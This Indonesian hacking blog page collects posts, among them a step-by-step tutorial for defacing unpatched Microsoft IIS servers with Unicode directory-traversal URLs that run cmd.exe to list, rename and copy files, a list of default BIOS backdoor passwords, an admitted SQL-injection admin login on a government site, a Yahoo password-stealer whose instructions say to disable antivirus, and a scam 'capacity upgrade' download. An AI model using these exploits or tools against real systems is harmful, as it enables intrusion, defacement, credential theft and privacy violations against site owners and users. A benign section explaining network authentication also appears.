News Update :
Tampilkan postingan dengan label hacker. Tampilkan semua postingan
Tampilkan postingan dengan label hacker. Tampilkan semua postingan

Trik Ubah Flashdisk 1GB jadi 2GB | Hack Tool Source Trik Ubah Flashdisk 1GB jadi 2GB | Hack Tool

Bagi Sobat Yang punya Flashdisk butut 1gb dan kepengin sekali beli yang lebih besar misal 2GB tapi lagi terkena KANKER,Tunggu dulu!!! Hitung-hitung buat tambahan Jajan. Ini ada cara Akalain Flashdisk 1GB menjadi 2 GB, dan So Pasti Real dan bukan bohongan karena saya sendiri termasuk yang sering kena Kanker SEO.
Cara Upgrade Flashdisk 1gb jadi 2gb cukup Mudah dan Gratis, Sobat Cukup Install Softyware Gratis berikut lalu di Upgrade.
Kebetulan saat ini yang tersedia hanya yang 2GB, insyaallah kalau ada bocoran baru untuk kapasitas yang lebih besar nanti saya akan Share juga di blog ini.
Buruan Download Softwarenya disini :
Download

mempercayai password : network authentication

Aspek security jaringan berkaitan erat dengan servis yang disediakan: inbound atau outbound. Security pada servis outbound dapat diupayakan sebaik mungkin dengan konfigurasi firewall. Demikian pula dengan akses anonymous servis inbound, seperti anonymous FTP, HTTP, Gopher dll. Dalam hal ini, informasi sengaja disediakan bagi semua orang. Lain halnya bila kita ingin menyediakan akses non-anonymous (atau authenticated services), dimana selain melalui firewall, seseorang yang meminta akses juga harus mendapat 'ijin' server setelah terlebih dahulu membuktikan identitasnya. Inilah authentication. Untuk selanjutnya, penulis menggunakan istilah autentisasi sebagai sinonim kata tersebut. RESIKO-SECURITY SERVIS INBOUND Mengapa perlu autentisasi…..? Internet adalah jaringan publik, dan terbuka bagi setiap orang diseluruh penjuru dunia untuk menggabungkan diri. Begitu besarnya jaringan ini, telah menimbulkan keuntungan serta kerugian. Sering kita dengar dan baca tentang bobolnya sistem komputer keuangan bank, informasi rahasia Pentagon atau basis data transkrip akademik mahasiswa. Kalimat tersebut cukup untuk mewakili pernyataan bahwa kita harus 'waspada' terhadap orang-orang 'jahat' dan senantiasa berusaha memperkecil kemungkinan bagi mereka untuk dapat melakukan niat jahatnya. Memang mudah untuk meniadakan kemungkinan penyusupan (akses ilegal) dari luar dengan menutup semua kanal trafik servis inbound ke jaringan internal. Namun ini berarti telah mereduksi keuntungan utama adanya jaringan: komunikasi dan pemakaian sumber daya bersama (sharing resources). Jadi, konsekuensi alami dengan jaringan cukup besar, adalah menerima dan berusaha untuk memperkecil resiko ini, bukan meniadakannya. Kita akan mulai dari seorang network-administrator (NA) yang telah melakukan tugasnya dengan baik, dalam menyiapkan 'pertahanan' bagi semua servis outbound dan anonymous-inbound. Perlu beberapa hal tambahan lagi yang sebaiknya diingat. Apakah pertahanan tersebut sudah cukup kuat bagi terjadinya pencurian hubungan (hijacking attack)? Apakah didalamnya sudah dipertimbangkan kemungkinan pemonitoran ilegal paket-paket informasi yang dikirimkan (packet sniffing - playback attack)? Atau apakah sudah termasuk kesiapan bagi benar-benar adanya akses ilegal didalam sistem (false authentication)? Hijacking biasanya terjadi pada komputer yang menghubungi jaringan kita, walaupun untuk beberapa kasus langka, bisa terjadi pada sembarang jalur yang dilaluinya. Sehingga akan bijaksana bila seorang NA mempertimbangkan pemberian kepercayaan akses, hanya dari komputer yang paling tidak mempunyai sistem security sama atau mungkin lebih 'kuat', dibandingkan dengan jaringan dibawah tanggung-jawabnya. Usaha memperkecil peluang musibah ini, juga dapat dilakukan dengan mengatur packet-filter dengan baik atau menggunakan server modifikasi. Misalnya, kita dapat menyediakan fasilitas anonymous-FTP bagi sembarang komputer dimanapun, tapi authenticated-FTP hanya diberikan pada host-host yang tercantum pada daftar 'kepercayaan'. Hijacking ditengah jalur dapat dihindari dengan penggunaan enkripsi antar jaringan (end to end encryption). Kerahasiaan data dan password juga merupakan topik disain security. Program yang didedikasikan untuk packet-sniffing dapat secara otomatis menampilkan isi setiap paket data antara client dengan servernya. Proteksi password dari kejahatan demikian dapat dilakukan dengan implementasi password sekali pakai (non-reusable password), sehingga walaupun dapat termonitor oleh sniffer, password tersebut tidak dapat digunakan lagi. Resiko hijacking dan sniffing data (bukan password) tidak dapat dihindari sama sekali. Artinya NA harus mempertimbangkan kemungkinan ini dan melakukan optimasi bagi semakin kecil-nya kesempatan tersebut. Pembatasan jumlah account dengan akses penuh serta waktu akses jarak jauh, merupakan salah satu bentuk optimasi. MEKANISME AUTENTISASI Subyek autentisasi adalah pembuktian. Yang dibuktikan meliputi tiga kategori, yaitu: sesuatu pada diri kita (something you are SYA), sesuatu yang kita ketahui (something you know SYK), dan sesuatu yang kita punyai (something you have SYH). SYA berkaitan erat dengan bidang biometrik, seperti pemeriksaan sidik-jari, pemeriksaan retina mata, analisis suara dll. SYK identik dengan password. Sedangkan bagi SYH umumnya digunakan kartu identitas seperti smartcard. \ Barangkali, yang sekarang masih banyak digunakan adalah sistem ber-password. Untuk menghindari pencurian password dan pemakaian sistem secara ilegal, akan bijaksana bila jaringan kita dilengkapi sistem password sekali pakai. Bagaimana caranya penerapan metoda ini? Pertama, menggunakan sistem perangko-waktu ter-enkripsi. Dengan cara ini, password baru dikirimkan setelah terlebih dulu dimodifikasi berdasarkan waktu saat itu. Kedua, menggunakan sistem challenge-response (CR), dimana password yang kita berikan tergantung challenge dari server. Kasarnya kita menyiapkan suatu daftar jawaban (response) berbeda bagi 'pertanyaan' (challenge) yang berbeda oleh server. Karena tentu sulit sekali untuk menghafal sekian puluh atau sekian ratus password, akan lebih mudah jika yang dihafal adalah aturan untuk mengubah challenge yang diberikan menjadi response (jadi tidak random). Misalnya aturan kita adalah: "kapitalkan huruf kelima dan hapus huruf keempat", maka password yang kita berikan adalah MxyPtlk1 W2 untuk challenge sistem Mxyzptlk1 W2. Kalau pada sistem CR, harus diketahui 'aturan'-nya, maka pada sistem perangko-waktu, kita mesti mengingat password bagi pemberian perangko-waktu ini. Apakah cara seperti ini tidak mempersulit? Beruntung sekali mekanisme tersebut umumnya ditangani oleh suatu perangkat, baik perangkat lunak ataupun dengan perangkat keras. Kerberos, perangkat lunak autentisasi yang dibuat di MIT dan mengadopsi sistem perangko-waktu, mewajibkan modifikasi client bagi sinkronisasi waktu dengan server serta pemberian password perangko-waktu. Modifikasi program client mengingatkan kita pada proxy dan memang, kurang lebih seperti itu. Sistem CR biasanya diterapkan sekaligus dengan dukungan perangkat keras. Contoh sistem CR operasional adalah perangkat SNK-004 card (Digital Pathways) yang dapat diterapkan bersama-sama dengan paket TIS-FWTK (Trusted Information System - internet FireWall ToolKit). TIS-FWTK menawarkan solusi password sekali pakai (sistem CR) yang 'menyenangkan': S/Key. S/Key menerapkan prosedur algoritma hash iteratif terhadap suatu seed, sedemikian sistem dapat memvalidasi response-client instant tapi tidak mempunyai kemampuan untuk memprediksi response-client berikutnya. Sehingga bila terjadi penyusupan pada sistem, tidak ada 'sesuatu' yang bisa dicuri (biasanya daftar password). Algoritma hash mempunyai dua sifat utama. Pertama, masukan tidak bisa diregenerasikan dari keluaran (non-reversibel). Kedua, terdapat dua kemungkinan masukan bagi sebuah keluaran yang sama. ENKRIPSI DAN CRYPTOGRAPHY Cryptography telah berkembang sejak lama, ketika orang menginginkan informasi yang ia kirimkan tidak dapat 'dibaca' oleh pihak tak berkepentingan. Secara tradisional cryptography dikenal dengan dua mekanisme, kunci privat atau kunci publik. DES (data encryption standard) yang digunakan oleh Kerberos menggunakan sistem kunci-privat. RSA (Rivest Shamir Addleman) mengimplementasikan sistem kunci-publik. Salah satu dari kontributor RSA, Ron Rivest kemudian membuat MD4 ( message digest function # 4) yang digunakan oleh S/Key-nya TIS-FWTK. Optimasi dan blasteran antara kedua metoda tradisional ini melahirkan PGP (Pretty Good Privacy). Pembahasan dari DES, RSA, atau PGP merupakan buku tersendiri dan tidak pada tempatnya diungkapkan disini. Tapi yang jelas, sistem kunci-privat dicirikan dengan proses encrypt-decrypt melalui kunci identik, sedangkan pada sistem kunci-publik, proses ini dilakukan dengan dua buah kunci: kunci publik untuk encrypt dan kunci rahasia untuk decrypt dimana kedua kunci ini digenerasikan dan mempunyai relasi dekat melalui sebuah algoritma matematis. Karena diperlukan proses matematis terlebih dulu, kecepatan sistem kunci-publik bisa ribuan kali lebih lambat dari algoritma kunci-privat ekivalen walaupun disisi lain menawarkan proteksi lebih baik. Eksploitasi terhadap kelebihan dan kekurangan sistem kunci privat dan publik dilakukan PGP, dimana untuk transmisi data dilakukan secara sistem kunci- privat dengan session-key sehingga berjalan cepat, sedangkan transmisi session-key- nya sendiri menggunakan kunci-publik. Dengan enkripsi, informasi yang kita kirimkan ke suatu jaringan melalui jaringan lain yang keamanannya meragukan (internet), relatif lebih terjamin. Enkripsi antar jaringan menyebabkan seorang 'pencuri' harus berusaha sedikit lebih keras untuk mendapatkan informasi ilegal yang ia harapkan. Ada beberapa kesempatan bagi implementasi enkripsi, yaitu: pada level aplikasi, level data-link, dan level jaringan. Enkripsi pada level aplikasi mensyaratkan penggunaan perangkat lunak client-server khusus. Sesuai dengan model referensi OSI, enkripsi data-link hanya berlaku untuk hubungan titik ke titik, seperti sistem enkripsi pada modem telepon. Sedangkan enkripsi level jaringan (network layer) diterapkan pada router atau peralatan lain yang bersebelahan dengan jaringan dikedua sisi. Optimasi kepentingan dan kebijakan security dilakukan dengan mengatur jenis/bagian paket IP yang akan dienkrip, penyesuaian terhadap arsitektur firewall dan konsekuensinya, efektifitas distribusi kunci-enkripsi dll. Di masa depan, dimana teknologi VLAN ( Virtual LAN) diperkirakan menjadi pilihan utama untuk Intranet ( enterprisewide), penggunaan enkripsi level jaringan ini menjadi begitu penting. Barangkali sama pentingnya dengan keadaan sebuah perusahaan yang sementara ini 'terpaksa' menggunakan internet sebagai jalur bagi pengiriman informasi sensitif antara kantor pusat dengan cabangnya dibelahan bumi yang lain. KERBEROS DAN TIS-FWTK AUTHENTICATION SERVER Kerberos adalah salah satu karya proyek Athena, kolaborasi antara MIT, IBM dan DEC. Kerberos didisain untuk medukung autentisasi dan enkripsi data pada lingkungan terdistribusi melalui modifikasi client atau server standard. Beberapa vendor sistem operasi telah memasukan Kerberos kedalam produknya. MIT sendiri menyediakan secara free banyak versi Unix yang telah di-Kerberizing. Bahkan bagi kepentingan porting ke sistem operasi atau perangkat lunak client-server yang belum mendukung Kerberos, MIT menyediakan source-code nya, juga secara free. Proyek Athena sendiri mengimplementasikan Kerberos pada banyak aplikasi seperti NFS, rlogin, email, dan sistem password. Secure RPC (Sun Microsystems) juga mengimplementasikan hal yang sama. Ada beberapa hal yang perlu dipertimbangkan dalam implementasi Kerberos. Modifikasi perangkat lunak client dan server akan menyebabkan pembatasan pilihan aplikasi. Sayangnya juga tidak ada metoda alternatif sebagai pengganti modifikasi source-code ( seperti dalam proxy yang membolehkan custom user procedure atau custom client software). Kemudian, umumnya orang juga sepakat untuk menyebut: "Kerberos relatif sulit diterapkan/ dikelola". Paket sistem autentisasi lain ditawarkan oleh TIS-FWTK: authentication-server. Server ini didisain secara modular, fleksibel sehingga mendukung banyak mekanisme autentisasi populer seperti sistem password reusable standard, S/Key, card SecurdID dari Security Dynamics (sistem dengan perangko-waktu), card SNK-004 Digital Pathways (sistem CR) serta kemudahan untuk pengintegrasian mekanisme baru. Kembali kepada perbincangan diawal tulisan ini, kalau kepentingan utama kita adalah bagaimana menyiapkan 'pertahanan' bagi servis inbound non-anonymous, barangkali authentication-server adalah solusi yang patut dipertimbangkan. Mengapa? Bagaimana sistem ini bekerja? Tidak banyak ruang dalam tulisan ini untuk memuat semua diskusi kita tentang autentisasi, tapi ilustrasi penutup berikut akan memberikan sedikit gambaran bagi anda, peminat security jaringan, menyangkut authentication-server.

Menjebol Password BIOS

Password BIOS memang sangat berguna untuk melindungi komputer Anda supaya tidak ada orang lain yang dapat mengganti konfigurasi komputer Anda. Tapi password tersebut bisa menjadi malapetaka jika Anda lupa. Nah, jika Anda lupa password BIOS Anda, di bawah ini kami tampilkan default password yang aslinya memang disediakan oleh pembuatnya untuk mengantisipasi kejadian password yang terlupakan. Yang perlu Anda lakukan adalah mencoba satu per satu password tersebut sampai Anda menemukannya smile AWARD BIOS 01322222 , 589589 , 589721 , 595595 , 598598 , AWARD SW, AWARD_SW, Award SW, AWARD PW, award, awkward, J64 , j256 , j262 , j332 , j322 , HLT, SER, SKYFOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ% AMI BIOS AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder PHOENIX BIOS, CMOS, phoenix, PHOENIX Password lainnya yang bisa Anda cob LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

PHP Security – Cek Bug PHP Script Line Break


Setelah terampungkan script php yang telah kita buat ada kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi system.

Dan siapa sangka script php yang telah dibuat itu aman dari kerentanan dalam masalah security. biggrin ~

Lalu, bagaimana mencegah sang hacker mengekploitasi, bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua ?? biggrin

Sebelum kita beralih maju ke langkah selanjutnya ada baiknya untuk mengenali bug popular yang paling sering diexploitasi.

Penulis akan mencoba untuk memberikan sedikit penjelasan, bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content Management system maupun yang lainnya. Di antaranya :

- XSS ( Cross Site Scripting )
- SQL Injection
- RFI ( Remote File Inclusion )

Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi karena tidak adanya filtering pada html maupun java script.

Tetapi pada dasarnya defacing ( perubahan kontent ) hanya terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat mencuri cookie kemudian menggunakannya untuk berbuat sesuatu yang ... biggrin ~~

Contohnya :
Sensored [ maaf ]

SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker yang mencoba melakukan inject query sql melalui form ataupun via address bar pada browser internet. Sebagai contohnya ketika penulis mencoba login sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id ). Dengan menggunakan query ' or 1=1-- penulis pun berhasil login. Pada dasarnya ' atau single quote dan or 1=1-- itu berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh server sql adalah menjalankan query " select * ". Yang terjadi adalah penulis diloloskan untuk login sebagai admin.

Berikut adalah gambar yang penulis capture ketika penulis berhasil login sebagai admin pada situs http://www.sumsel.go.id

Gambar ini diambil sebelum penulis mengontak webmaster via email untuk mempatch script phpnya.

RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut. Apabila user memasukkan url evil script miliknya pada variable yang digunakan dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan command di server milik anda untuk merubah konten situs atau bahkan merusaknya. biggrin ~~

Untuk contohnya silahkan anda cari di www.milw0rm.com biggrin ~

Keywordnya Remote File Inclusion. biggrin ~

Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm ... tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara tidak sengaja maupun sengaja. biggrin ~

Pada dasarnya untuk mengecek bug dapat dilakukan secara online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di localhost anda ( offline ) saja.

Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda adalah sebuah addons mozilla firefox yang disediakan secara gratis. Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.

Tools tersebut dapat anda download disini :
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah digunakan telah disediakan untuk melakukan cek bug sql injection. biggrin

Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler interpreter ini nantinya digunakan untuk menjalankan script inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke direktori c:perlbin

Langkah selanjutnya :

1. Masukkan script yang akan anda scan kedalam sebuah direktori di c:perl php.

ex : c:perlwordpress.

2. Masuk ke command prompt, start | run | cmd | enter

3. Setelah itu masuk ke direktory c:perlbin, cd c:perlbin

4. Jalankan scriptnya,

Crazzerlbin>perl.exe inclusionscanner.pl

#Will check a directory for all includes and unsets

#Coded by Ironfist (ironsecurity.nl)

#Usage: create a folder in your perlfolder and put the files to be scanned in it

, next type the folder name below (eg myfolder)

#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM smile

Directory to read? c:perlwp

kemudian lihat hasilnya di c:perlbinresult.html

berikut hasil scan ketika penulis mencoba untuk melakukan cek inclusion pada wordpress-2.3.3 :

FOUND: require_once($locale_file);
in c:perlwp/wp-settings.php FOUND: require_once($import_root . '/' . $file);
in c:perlwp/wp-admin/import.php FOUND: include_once($this->PluginDir . "class-smtp.php"wink;
in c:perlwp/wp-includes/class-phpmailer.php FOUND: include($lang_path.'phpmailer.lang-'.$lang_type.'.php'wink;
in c:perlwp/wp-includes/class-phpmailer.php FOUND: include($lang_path.'phpmailer.lang-en.php'wink;
in c:perlwp/wp-includes/class-phpmailer.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: require_once($_template_file);
in c:perlwp/wp-includes/theme.php

woww !!! biggrin ~ silahkan di exploitasi eh di patch script milik anda. biggrin ~

Deface NT Web

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..smile sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

*DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com";
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)


Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.


Cara pertama :
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Kumpulan javascript facebook hacking

Berikut ini beberapa kumpulan Hack Facebook. Semoga tips ini berguna bagi para facebooker yang gelisah dengan setting default facebook yang monoton. Facebook Hack ini bisa membantu melayout tampilan facebook anda lebih dinamis lagi :

1. Menghapus iklan Facebook
Tampilan iklan facebook, terkadang menjengkelkan. Untuk Menyingkirkannya, gunakan script berikut ini:

Install

2. Cara melihat real profil dari halaman umum
Script berikut ini bisa mengalihkan detail profil dari orang-orang dalam Facebook.

Install

3. Membatalkan perubahan setting Facebook
Jika anda tidak suka dengan beberapa perubahan setting baru pada Facebook, anda bisa membatalkannya dengan script berikut ini hingga kembali ke setting awal

Install

4. Melihat Semua Foto dari seorang facebooker
Anda dapat mencari gambar dari anggota Facebook yang memiliki pengaturan privasi yang ketat dan melihat foto-fotonya meski tanpa persetujuannya.

Install

5. Menemukan banyak teman di Facebook
Gunakan script ini untuk mencari lebih banyak teman dengan melewati teman yang telah terdaftar.

Install

6. Berbagi File di Facebook
Dengan widget berikut ini, anda bisa sharing file melalui Facebook dengan teman-teman anda.

Install

7. Mencari lowongan pekerjaan dari Facebook
Aplikasi ini memberikan pengguna Facebook akses ke informasi jenis pekerjaan, peluang bisnis dan jaringan karir lainnya.

Install

8. Meningkatkan keamanan data privasi
Pengaturan privasi yang lebih serius tanpa mengganggu kenyamanan berkomunikasi

Install

[images.jpg]

prog. buat mencuri password yahoo

prog. buat mencuri password yahoo



cara menggunakannya:
1. download (selama proses download matikan AV)
2. nyalakan yahoo massengger
3. klik 2x program tersebut (akan kluar db seperti diatas)
4. tulis alamat e-mail kalian masing2 di kolom yg ada nick saya.
5. lalu klik DeCoder
setelah klik DeCoder password orang2 yg ada di list ym akan terkirim ke e-mail kita. (kalo mereka pake YM versi 8 keatas akan selamat dr program ini)
nb : matikan AV, karena sebagian AV memanggap program ini trojan tetapi yg jelas bukanlah trojan
Code:
sedot di sini

Free Account Premium FullReleasez.com `Hacked`

Free Account Premium FullReleasez.com `Hacked`

Fullreleasez free account hacked


